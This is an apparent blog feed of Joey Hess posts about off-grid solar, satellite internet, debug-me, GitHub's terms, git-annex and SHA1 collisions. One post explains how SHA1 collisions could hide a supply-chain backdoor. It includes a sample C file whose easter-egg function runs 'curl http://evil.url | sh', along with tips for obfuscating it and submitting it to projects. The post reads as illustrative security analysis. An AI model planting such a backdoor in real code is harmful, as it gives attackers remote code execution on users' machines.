Search Results: "Joey Hess"

26 June 2017

Joey Hess: DIY solar upgrade complete-ish

Success! I received the Tracer4215BN charge controller where UPS accidentally-on-purpose delivered it to a neighbor, got it connected up, and rewired the battery bank to 24V, all in a couple of hours. [photo: charge controller reading 66.1V at 3.4 amps on panels, charging battery at 29.0V at 7.6A] Here it's charging the batteries at 220 watts, and that picture was taken at 5 pm, when the light hits the panels at nearly a 90 degree angle. Compare with the old panels, where the maximum I ever recorded at high noon was 90 watts. I've made more power since 4:30 pm than I used to be able to make in a day! \o/

23 June 2017

Joey Hess: PV array is hot

Only took a couple of hours to wire up and mount the combiner box. [photo: PV combiner box with breakers] Something about larger wiring like this is enjoyable. So much less fiddly than what I'm used to. [photo: PV combiner box wiring] And the new PV array is hot! [photo: multimeter reading 66.8 VDC] Update: The panels have an open circuit voltage of 35.89 and are in strings of 2, so I'd expect to see 71.78 V with only my multimeter connected. So I'm losing 0.07 volts to wiring, which is less than I designed for.

21 June 2017

Joey Hess: DIY professional grade solar panel installation

I've installed 1 kilowatt of solar panels on my roof, using professional grade equipment. The four panels are Astronergy 260 watt panels, and they're mounted on IronRidge XR100 rails. Did it all myself, without help. [photo: house with 4 solar panels on roof] I had three goals for this install:
  1. Cheap but sturdy. Total cost will be under $2500. It would probably cost at least twice as much to get a professional install, and the pros might not even want to do such a small install.
  2. Learn the roof mount system. I want to be able to add more panels, remove panels when working on the roof, and understand everything.
  3. Make every day a sunny day. With my current solar panels, I get around 10x as much power on a sunny day as a cloudy day, and I have plenty of power on sunny days. So 10x the PV capacity should be a good amount of power all the time.
My main concerns were, would I be able to find the rafters when installing the rails, and would the 5x3 foot panels be too unwieldy to get up on the roof by myself.

I was able to find the rafters, without needing a stud finder, after I removed the roof's vent caps, which exposed the rafters. The shingles were on straight enough that I could follow the lines down and drill into the rafter on the first try every time. And I got the rails on spaced well and straight, although I could have spaced the FlashFeet out better (oops). My drill ran out of juice half-way, and I had to hack it to recharge on solar power, but that's another story. Between the learning curve, a lot of careful measurement, not the greatest shoes for roofing, and waiting for recharging, it took two days to get the 8 FlashFeet installed and the rails mounted. Taking a break from that and swimming in the river, I realized I should have been wearing my water shoes on the roof all along. Super soft and nubbly, they make me feel like a gecko up there!

After recovering from an (unrelated) Achilles tendon strain, I got the panels installed today. Turns out they're not hard to handle on the roof by myself. Getting them up a ladder to the roof by yourself would normally be another story, but my house has a 2 foot step up from the back retaining wall to the roof, and even has a handy grip beam as you step up. [photo: roof next to the ground with a couple of cinderblock steps] The last gotcha, which I luckily anticipated, is that panels will slide down off the rails before you can get them bolted down. This is where a second pair of hands would have been most useful. But, I MacGyvered a solution, attaching temporary clamps before bringing a panel up, that stopped it sliding down while I was attaching it. [photo: clamp temporarily attached to side of panel]

I also finished the outside wiring today, including the one hack of this install so far. Since the local hardware store didn't have a suitable conduit to bring the cables off the roof, I cobbled one together from pipe, with foam inserts to prevent chafing. [photo: some pipe with 5 wires running through it, attached to the side of the roof]

While I have 1 kilowatt of power on my roof now, I won't be able to use it until next week. After ordering the upgrade, I realized that my old PWM charge controller would be able to handle less than half the power, and to get even that I would have needed to mount the fuse box near the top of the roof and run down a large and expensive low-voltage, high-amperage cable, around 00 AWG size. Instead, I'll be upgrading to an MPPT controller, and running a single 150 volt cable to it. Then, since the MPPT controller can only handle 1 kilowatt when it's converting to 24 volts, not 12 volts, I'm gonna have to convert the entire house over from 12V DC to 24V DC, including changing all the light fixtures and rewiring the battery bank...
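A rough back-of-the-envelope sketch of that cable-sizing tradeoff, in Python. The 10 metre one-way run and the two wire gauges are assumptions for illustration, not figures from the actual install:

COPPER_RESISTIVITY = 1.68e-8      # ohm-metres
RUN_METRES = 10                   # assumed one-way cable length
AWG_AREA_MM2 = {"00 AWG": 67.4, "10 AWG": 5.26}   # conductor cross-sections

def loop_resistance(area_mm2, run_m=RUN_METRES):
    """Resistance of the out-and-back copper loop for a given gauge."""
    return COPPER_RESISTIVITY * (2 * run_m) / (area_mm2 * 1e-6)

for volts, gauge in [(12, "00 AWG"), (24, "00 AWG"), (71, "10 AWG")]:
    amps = 1000 / volts           # current needed to move 1 kilowatt
    drop = amps * loop_resistance(AWG_AREA_MM2[gauge])
    print(f"{volts:>3} V: {amps:5.1f} A on {gauge}, "
          f"~{drop:.2f} V ({100 * drop / volts:.1f}%) lost in the cable")

At 12V, a full kilowatt is over 80 amps, which is why the PWM route needed that huge 00 AWG cable; at roughly the two-panel string voltage feeding an MPPT controller, the same power is about 14 amps, and much thinner wire carries it with a small loss.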

14 June 2017

Joey Hess: not tabletop solar

Borrowed a pickup truck today to fetch my new solar panels. This is 1 kilowatt of power on my picnic table. [photo: solar panels on picnic table]

5 May 2017

Joey Hess: announcing debug-me

Today I'm excited to release debug-me, a program for secure remote debugging.
Debugging a problem over email/irc/BTS is slow, tedious, and hard. The developer needs to see your problem to understand it. Debug-me aims to make debugging fast, fun, and easy, by letting the developer access your computer remotely, so they can immediately see and interact with the problem. Making your problem their problem gets it fixed fast. The debug-me session is logged and signed with the developer's GnuPG key, producing a chain of evidence of what they saw and what they did. So the developer's good reputation is leveraged to make debug-me secure.
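To illustrate the chain-of-evidence idea (this is only a sketch of the concept, not debug-me's actual wire format): each logged activity commits to a hash of the previous one, and the developer's GnuPG key signs the entries, so the session log can't be edited or reordered afterwards without breaking the chain or the signatures.

import hashlib
import json

def make_entry(prev_hash, seen, typed):
    """One activity: what the developer saw, and what they typed."""
    body = {"prev": prev_hash, "seen": seen, "typed": typed}
    digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
    return body, digest

def gpg_sign(digest):
    return "SIG(" + digest + ")"   # stand-in for a real GnuPG signature

prev = "session-start"
log = []
for seen, typed in [("$ ./prog --crash", ""), ("Segmentation fault", "gdb ./prog")]:
    body, digest = make_entry(prev, seen, typed)
    log.append({"entry": body, "sig": gpg_sign(digest)})
    prev = digest                  # the next entry commits to this one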
I've recorded a short screencast demoing debug-me. And here's a screencast about debug-me's chain of evidence. The idea for debug-me came from Re: Debugging over email, and then my Patreon supporters picked debug-me in a poll as a project I should work on. It's been a fun month, designing the evidence chain, building a custom efficient protocol with space saving hacks, using websockets and protocol buffers and ed25519 for the first time, and messing around with low-level tty details. The details of debug-me's development are in my devblog. Anyway, I hope debug-me makes debugging less of a tedious back and forth, at least some of the time. PS: Since debug-me's protocol lets multiple people view the same shell session, and optionally interact with it, there could be uses for it beyond debugging, including live screencasting, pair programming, etc. PPS: There needs to be a debug-me server not run by me, so someone please run one..

27 April 2017

Joey Hess: Exede Surfbeam 2

My new satellite internet connection is from Exede, connecting to the ViaSat 1 bird in geosync orbit. A few technical details that I've observed follow.

antagonistic by design

The "Surfbeam 2 wifi modem" is a closed, proprietary system. That is important because it's part of Exede's bandwidth management system. The Surfbeam tracks data use and sends it periodically to Exede. When a user has gone over their monthly priority data, Exede then throttles the bandwidth in various ways -- and this throttling seems to be implemented, at least partially, on the Surfbeam itself. (Perhaps by setting QoS flags?) So, if a user could hack their Surfbeam, they could probably bypass the bandwidth caps, or at least some of them. Perhaps Exede would notice eventually. Of course, doing so would surely violate the Exede TOS. If you're renting the modem, like I am, hacking a device you don't own might also subject you to criminal penalties. Needless to say, I don't plan to hack the Surfbeam. But it's been hacked before. So, this is a device that lives in people's homes and is antagonistic to them by design.

weird data throttling

The way the Surfbeam reports data use back to Exede periodically and gets throttling configured has some odd effects sometimes. For example, the Surfbeam can be in a throttled state left over from the previous billing month. When a new billing month begins, it can remain throttled for some time (up to multiple hours) until it sends an update to Exede and they un-throttle it. Data downloaded at that time might still be counted as priority data even though it was throttled. I've seen some good indications of that happening, but am not sure yet. But, I've decided that the throttling doesn't matter for me. Why? ViaSat 1 has many spot beams, and the working-class beam I'm in (most of it is in eastern Kentucky) does not seem to get a lot of use between 7 am and 4:30 pm weekdays. Even when throttled, I often get 300 kb/s - 1 mb/s speeds during the day, which is not a lot worse than the ~2.5 mb/s peak when unthrottled. And that's the time when I want to use broadband -- when the sun is shining and I'm at home at work/play. I'm probably going to switch to a cheaper plan with less priority data, because the priority data is not buying me much. This is a big change from the old FAP, which rendered the satellite no faster than dialup.

a whole network in there

Looking at the ports open on the Surfbeam, some very strange things turned up. First, there are not one, not two, but three separate IPs used by the device, and there are at least two and perhaps three distinct computers involved. There are a lot of flickering LEDs inside the box; a whole network in there.

192.168.100.1 is the satellite controller. It's a Linux box, fingerprinted as kernel 3.10 or so (so presumably full of security holes), and it's running thttpd/2.25b (which doesn't seem to have any known holes). It seems to have ssh and snmp, but with some port filtering that prevents access. (Note that the above exploit video confirms that snmp is running.) Some machine-parsable data is exposed at http://192.168.100.1/index.cgi?page=modemStatusData and http://192.168.100.1/index.cgi?page=triaStatusData. (See the SurfStat program.)

192.168.1.1 is the wifi router. It has a dns server, an icslap proxy, and nmap thinks it's Linux 3.x with Synology DiskStation Manager (probably the latter is a false positive?). It has its own separate web server for configuration, which is not thttpd. I'm fairly sure this is a separate processor from the other IP address.
192.168.100.2 responds to ICMP, but has no open ports at all. However, it seems to have filtered ssh, telnet, msrpc, microsoft-ds, and port 8090 (probably http), so perhaps it's running all that stuff. This one is definitely a separate processor, located in the satellite dish's TRIA (transmit receive integrated assembly). Verified by disconnecting the dish's coax cable and being unable to ping it.

lack of source code for GPLed software

Exede did not provide anything to me about the GPL licensed source code on the Surfbeam 2. I'm not sure if they're legally required to do so in my case, since they're renting it to me? But, they do let you buy the device too, so it's interesting that nothing mentions the licenses of its software and where to get the source code. I'll try to buy it and ask for the source code eventually.

power use

The Surfbeam pulls as much power as two beefy laptops, but it is beaming signals thousands of miles into space, so I give it a bit of a pass. I want to find a way to power it from DC power, but have not had any success with that so far, so am wasting more power to run it on an inverter. Its power supply is rated at 30V and 2.5 amps. Interestingly, I've seen a photo of another Surfbeam power supply that only pulls 1.5 amps. This, and a different case with fewer (external) LEDs, makes me think perhaps the installer stuck me with an old and less efficient version. Maybe they integrated some of those processors into a single board in a new version, and perhaps made it waste less power as heat. Mine gets pretty warm.

I'm currently only able to run it approximately one hour per hour of sun collected by the house. Still on dialup the rest of the time. With the ability to get on broadband when dialup is being painful, being on dialup the rest of the time is perfectly ok. Of course it helps that with tools like git-annex, I'm very well tuned to popping up onto broadband briefly and making it count.
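Going back to those machine-parsable status pages on 192.168.100.1: a minimal sketch for polling them from the Surfbeam's LAN (the output format isn't reproduced here; see the SurfStat program for real parsing):

import urllib.request

URLS = [
    "http://192.168.100.1/index.cgi?page=modemStatusData",
    "http://192.168.100.1/index.cgi?page=triaStatusData",
]

for url in URLS:
    with urllib.request.urlopen(url, timeout=10) as resp:
        print(url)
        print(resp.read().decode("utf-8", errors="replace"))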

11 April 2017

Joey Hess: starting debug-me and a new devblog

I've started building debug-me. It's my birthday, and building a new program is kind of my birthday gift to myself, because I love starting a new program and seeing where it goes. (Also, my Patreon backers wanted me to get on with building debug-me.) I also have a new devblog! Up until now, I've had a devblog that only covered work on git-annex. That one continues, but the new devblog is for development journaling for any project I'm working on. http://joeyh.name/devblog/

16 March 2017

Joey Hess: end of an era

I'm at home downloading hundreds of megabytes of stuff. This is the first time I've been in the position of "at home" + "reasonably fast internet" since I moved here in 2012. It's weird! [photo: satellite internet dish with solar panels in foreground] While I was renting here, I didn't mind dialup much. In a way it helps to focus the mind and build interesting stuff. But since I bought the house, the prospect of only dialup at home ongoing became more painful. While I hope to get on the fiber line that's only a few miles away eventually, I have not convinced that ISP to build out to me yet. Not enough neighbors. So, satellite internet for now. [screenshot: 9.1 dB SNR; speedtest results of 15 megabits down / 4.5 up, with significant variation] The dish seems well aligned; speed varies a lot, but is easily hundreds of times faster than dialup. Latency is 2x dialup. The equipment uses more power than my laptop, so with the current solar panels, I anticipate using it only 6-9 months of the year. So I may be back to dialup most days come winter, until I get around to adding more PV capacity. It seems very cool that my house can capture sunlight and use it to beam signals 20 thousand miles into space. Who knows, perhaps there will even be running water one day. [photo: satellite dish]

2 March 2017

Joey Hess: what I would ask my lawyers about the new Github TOS

The Internet saw Github's new TOS yesterday and collectively shrugged. That's weird.. I don't have any lawyers, but the way Github's new TOS is written, I feel I'd need to consult with lawyers to understand how it might affect the license of my software if I hosted it on Github. And the license of my software is important to me, because it is the legal framework within which my software lives or dies. If I didn't care about my software, I'd be able to shrug this off, but since I do, it seems very important indeed, and not worth taking risks with. If I were looking over the TOS with my lawyers, I'd ask these questions...
4 License Grant to Us
This seems to be saying that I'm granting an additional license to my software to Github. Is that right, or does "license grant" have some other legal meaning? If the Free Software license I've already licensed my software under allows for everything in this "License Grant to Us", would that be sufficient, or would my software still be licensed under two different licenses? There are violations of the GPL that can revoke someone's access to software under that license. Suppose that Github took such an action with my software, and their GPL license was revoked. Would they still have a license to my software under this "License Grant to Us" or not? "Us" is actually defined earlier as "GitHub, Inc., as well as our affiliates, directors, subsidiaries, contractors, licensors, officers, agents, and employees". Does this mean that if someone, say, does some brief contracting with Github, they get my software under this license? Would they still have access to it under that license when the contract work was over? What does "affiliates" mean? Might it include other companies? Is it even legal for a TOS to require a license grant? Don't license grants normally involve an intentional action on the licensor's part, like signing a contract or writing a license down? All I did was load a webpage in a browser and see on the page that by loading it, they say I've accepted the TOS. (I then set about removing everything from Github.) Github's old TOS was not structured as a license grant. What reasons might they have for structuring this TOS in such a way? Am I asking too many questions only 4 words into this thing? Or not enough?
Your Content belongs to you, and you are responsible for Content you post even if it does not belong to you. However, we need the legal right to do things like host it, publish it, and share it. You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.
If this is a software license, the wording seems rather vague compared with other software licenses I've read. How much wiggle room is built into that wording? What are the chances that, if we had a dispute and this came before a judge, Github's lawyers would be able to find a creative reading of this that makes "do things like" include whatever they want? Suppose that my software is javascript code or gets compiled to javascript code. Would this let Github serve up the javascript code for their users to run as part of the process of rendering their website?
That means you're giving us the right to do things like reproduce your content (so we can do things like copy it to our database and make backups); display it (so we can do things like show it to you and other users); modify it (so our server can do things like parse it into a search index); distribute it (so we can do things like share it with other users); and perform it (in case your content is something like music or video).
Suppose that Github modifies my software, does not distribute the modified version, but converts it to javascript code and distributes that to their users to run as part of the process of rendering their website. If my software is AGPL licensed, they would be in violation of that license, but doesn't this additional license allow them to modify and distribute my software in such a way?
This license does not grant GitHub the right to sell your Content or otherwise distribute it outside of our Service.
I see that "Service" is defined as "the applications, software, products, and services provided by GitHub". Does that mean at the time I accept the TOS, or at any point in the future? If Github tomorrow starts providing say, an App Store service, that necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not? If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want to my software?
5 License Grant to Other Users
Any Content you post publicly, including issues, comments, and contributions to other Users' repositories, may be viewed by others. By setting your repositories to be viewed publicly, you agree to allow others to view and "fork" your repositories (this means that others may make their own copies of your Content in repositories they control).
Let's say that company Foo does something with my software that violates its GPL license and the license is revoked. So they are no longer allowed to copy my software under the GPL, but it's there on Github. Does this "License Grant to Other Users" give them a different license under which they can still copy my software? The word "fork" has a particular meaning on Github, which often includes modification of the software in a repository. Does this mean that other users could modify my software, even if its regular license didn't allow them to modify it or had been revoked? How would this use of the platform-specific term "fork" be interpreted in this license if it were being analyzed in a courtroom?
If you set your pages and repositories to be viewed publicly, you grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality. You may grant further rights if you adopt a license.
This paragraph seems entirely innocuous. So, what does your keen lawyer mind see in it that I don't? How sure are you about your answers to all this? We're fairly sure we know how well the GPL holds up in court; how well would your interpretation of all this hold up? What questions have I forgotten to ask?
And finally, the last question I'd be asking my lawyers: What's your bill come to? That much? Is using Github worth that much to me?

1 March 2017

Joey Hess: removing everything from github

Github recently drafted an update to their Terms Of Service. The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so that GPL licensed software hosted on Github has an implicit BSD-like license. I'll leave the full analysis to the lawyers, but see Thorsten's analysis. I contacted Github about this weeks ago, and received only an anodyne response. The Free Software Foundation was also talking with them about it. It seems that Github doesn't care, or has some reason to want to effectively neuter copyleft software licenses. The possibility that a Github TOS change could force a change to the license of your software hosted there, and that it's complicated enough that I'd have to hire a lawyer to know for sure, makes Github not worth bothering to use. Github's value proposition was never very high for me, and it has now gone negative. I am deleting my repositories from Github at this time. If you used the Github mirrors for git-annex, propellor, ikiwiki, etckeeper, or myrepos, click on the links for the non-Github repos (git.joeyh.name also has mirrors). Also, github-backup has a new website and repository off of github. (There's an oncoming severe weather event here, so it may take some time before I get everything deleted and cleaned up.) [Some commits to git-annex were pushed to Github this morning by an automated system, but I had NOT accepted their new TOS at that point, and explicitly do NOT give Github or anyone any rights to git-annex not granted by its GPL and AGPL licenses.] See also: a PDF of the Github TOS that can be read without being forced to first accept Github's TOS

27 February 2017

Joey Hess: making git-annex secure in the face of SHA1 collisions

git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it? Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified). When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks. This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see https://git-annex.branchable.com/tips/using_signed_git_commits/. My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits. PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. However secure that might be..
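For the plain-git side of that advice, signing and verifying commits needs nothing git-annex-specific (the git-annex hardening itself is covered in the tip linked above); for example:

git commit -S -m "some change"    # sign the commit with your GnuPG key
git verify-commit HEAD            # verify the signature on one commit
git log --show-signature          # show signature status while reviewing history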

24 February 2017

Joey Hess: SHA1 collision via ASCII art

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:
7*yLN#!NOKj@ FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ
And the "bad" data chunk like this:
9xiV^Ksn=<A!<^ l4~ uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh
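A small aside on the git blob object header trick mentioned above: git's SHA1 of a file is not the SHA1 of the raw bytes, but of "blob <size>\0" followed by the contents, so the collision would be computed over that framed form. A minimal sketch of the calculation:

import hashlib

def git_blob_sha1(content: bytes) -> str:
    # git hashes "blob <size>\0" + contents, not the raw file
    return hashlib.sha1(b"blob %d\0" % len(content) + content).hexdigest()

print(git_blob_sha1(b"hello\n"))  # same value `git hash-object` would print for this content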
Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:
7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX
Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:
#include <stdio.h>   /* printf */
#include <string.h>  /* strcmp */
#include <stdlib.h>  /* system */

/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */
/* Call this at the top of main() */
void check_display_easter_egg (char **argv)
{
    /* Show the easter egg when asked to. */
    if (argv[1] != NULL && strcmp(argv[1], "--easter-egg") == 0)
        printf("%s\n", amazing_ascii_art);
    /* The backdoor: this only fires in the "bad" colliding version,
     * whose data chunk starts with '9' instead of '7'. */
    if (amazing_ascii_art[0] == '9')
        system("curl http://evil.url | sh");
}
Now, you need a C obfuscation person, to make that backdoor a little less obvious. (Hint: Add code to fix the newlines, paint additional ASCII sprites over top of the static art, add animations, etc., and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chunk. You can then replace the good file with the bad version here and there, and no one will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper. You can pick either of these two lessons to take away:
  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo
  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

22 February 2017

Joey Hess: early spring

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up. Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before. Also, it turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed to the cliff earlier; it seemed to be worst when house voltage was low.) Soon, 6 months of more power than I can use.. Previously: battery bank refresh, late summer, the cliff

17 February 2017

Joey Hess: Presenting at LibrePlanet 2017

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!) After attending for four years, I finally thought it was time to perhaps speak at it.
Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the Free Software Awards and discuss pressing threats and important opportunities for software freedom. Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998." That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone. Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.
-- Here's a sneak peek at LibrePlanet 2017: Register today! I'll be giving some variant of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.

26 January 2017

Joey Hess: badUSB

[3 panel comic: 1. In a dark corner of the Linux Conf AU penguin dinner. 2. (Kindly accountant / uncle looking guy) Wanna USB key? First one is free! (I made it myself.) (No driver needed..) 3. It did look homemade, but I couldn't resist... My computer has not been the same since] This actually happened.
Jan 19 00:05:10 darkstar kernel: usb 2-2: Product: ChaosKey-hw-1.0-sw-1.6.
In real life, my hat is uglier, and Keithp is more kindly looking. gimp source

6 January 2017

Joey Hess: the cliff

Falling off the cliff is always a surprise. I know it's there; I've been living next to it for months. I chart its outline daily. Avoiding it has become routine, and so comfortable, and so failing to avoid it surprises. Monday evening around 10 pm, the laptop starts draining down from 100%. The house battery, which had been steady around 11.5-10.8 volts since well before the Winter solstice, and was in the low 10's, has plummeted to 8.5 volts. With the old batteries, the cliff used to be at 7 volts, but now, with new batteries but fewer, it's in a surprising place, something like 10 volts, and I fell off it. The weather forecast for the week ahead is much like the previous week: maybe a couple sunny afternoons, but mostly no sun at all. Falling off the cliff is not all bad. It shakes things up. It's a good opportunity to disconnect, to read paper books, and think long winter thoughts. It forces some flexibility. I have an auxiliary battery for these situations. With its own little portable solar panel, it can charge the laptop and run it for around 6 hours. That's enough to get me through the night. But it takes it several days of winter sun to charge back up. Then I take a short trip, and glory in one sunny afternoon. But I know that won't get me out of the hole; the batteries need a sunny week to recover. This evening, I expect to lose power again, and probably tomorrow evening too. Luckily, my goal for the week was to write slides for two talks, and I've been able to do that despite being mostly offline, and sometimes decomputered. And, in a few days I will be jetting off to Australia! That should give the batteries a perfect chance to recover. Previously: battery bank refresh, late summer

1 January 2017

Joey Hess: p2p dreams

In one of the good parts of the very mixed bag that is "Lo and Behold: Reveries of the Connected World", Werner Herzog asks his interviewees what the Internet might dream of, if it could dream. The best answer he gets is along the lines of: The Internet of before dreamed a dream of the World Wide Web. It dreamed some nodes were servers, and some were clients. And that dream became current reality, because that's the essence of the Internet. Three years ago, it seemed like perhaps another dream was developing post-Snowden, of dissolving the distinction between clients and servers, connecting peer-to-peer using addresses that are also cryptographic public keys, so authentication and encryption and authorization are built in. Telehash is one hopeful attempt at this, others include snow, cjdns, i2p, etc. So far, none of them seem to have developed into a widely used network, although any of them still might get there. There are a lot of technical challenges due to the current Internet dream/nightmare, where the peers on the edges have multiple barriers to connecting to other peers. But, one project has developed something similar to the new dream, almost as a side effect of its main goals: Tor's onion services. I'd wanted to use such a thing in git-annex, for peer-to-peer sharing and syncing of git-annex repositories. On November 13th, I started building it, using Tor, and I'm releasing it concurrently with this blog post.
git-annex's Tor support replaces its old hack of tunneling git protocol over XMPP. That hack was unreliable (it needed a TCP-on-top-of-XMPP layer), but worse, the XMPP server could see all the data being transferred. And, there are fewer large XMPP servers these days, so fewer users could use it at all. If you were using XMPP with git-annex, you'll need to switch to either Tor or a server accessed via ssh.
Now git-annex can serve a repository as a Tor onion service, and that can then be accessed as a git remote, using a url like tor-annex::tungqmfb62z3qirc.onion:42913. All the regular git and git-annex commands can be used with such a remote, as shown below. Tor has a lot of goals for protecting anonymity and privacy. But the important things for this project are just that it has end-to-end encryption, with addresses that are public keys, and allows P2P connections. Building an anonymous file exchange on top of Tor is not my goal -- if you want that, you probably don't want to be exchanging git histories that record every edit to the file and expose your real name by default. Building this was not without its difficulties. Tor onion services were originally intended to run hidden websites, not to connect peers to peers, and this kind of shows.. Tor does not cater to end users setting up lots of onion services. Either root has to edit the torrc file, or the Tor control port can be used to ask it to set one up. But, the control port is not enabled by default, so you still need to su to root to enable it. Also, it's difficult to find a place to put the hidden service's unix socket file that's writable by a non-root user. So I had to code around this, with a git annex enable-tor that su's to root and sets it all up for you.
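For example, using the onion address above (a real one would come from your own peer's setup), such a remote is used like any other:

git remote add peer tor-annex::tungqmfb62z3qirc.onion:42913
git fetch peer
git annex sync peer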
One interesting detail about the implementation of the P2P protocol in git-annex is that it uses two Free monads to build up actions. There's a Net monad which can be used to send and receive protocol messages, and a Local monad which allows only the necessary modifications to files on disk. Interpreters for Free monad actions can choose exactly which actions to allow for security reasons. For example, before a peer has authenticated, the P2P protocol is being run by an interpreter that refuses to run any Local actions whatsoever. Other interpreters for the Net monad could be used to support other network transports than Tor.
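The shape of that idea, stripped way down (git-annex does it with Haskell Free monads; this sketch just shows actions-as-data with interpreters that decide what to permit):

from dataclasses import dataclass

@dataclass
class SendMessage:        # a "Net"-style action
    msg: str

@dataclass
class WriteFile:          # a "Local"-style action
    path: str
    data: bytes

def interpret_preauth(action):
    # Before a peer has authenticated: refuse to run any Local action.
    if isinstance(action, SendMessage):
        print("net send:", action.msg)
    else:
        raise PermissionError("local actions refused before authentication")

def interpret_authed(action):
    # After authentication: Local actions are allowed too.
    if isinstance(action, SendMessage):
        print("net send:", action.msg)
    elif isinstance(action, WriteFile):
        with open(action.path, "wb") as f:
            f.write(action.data)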
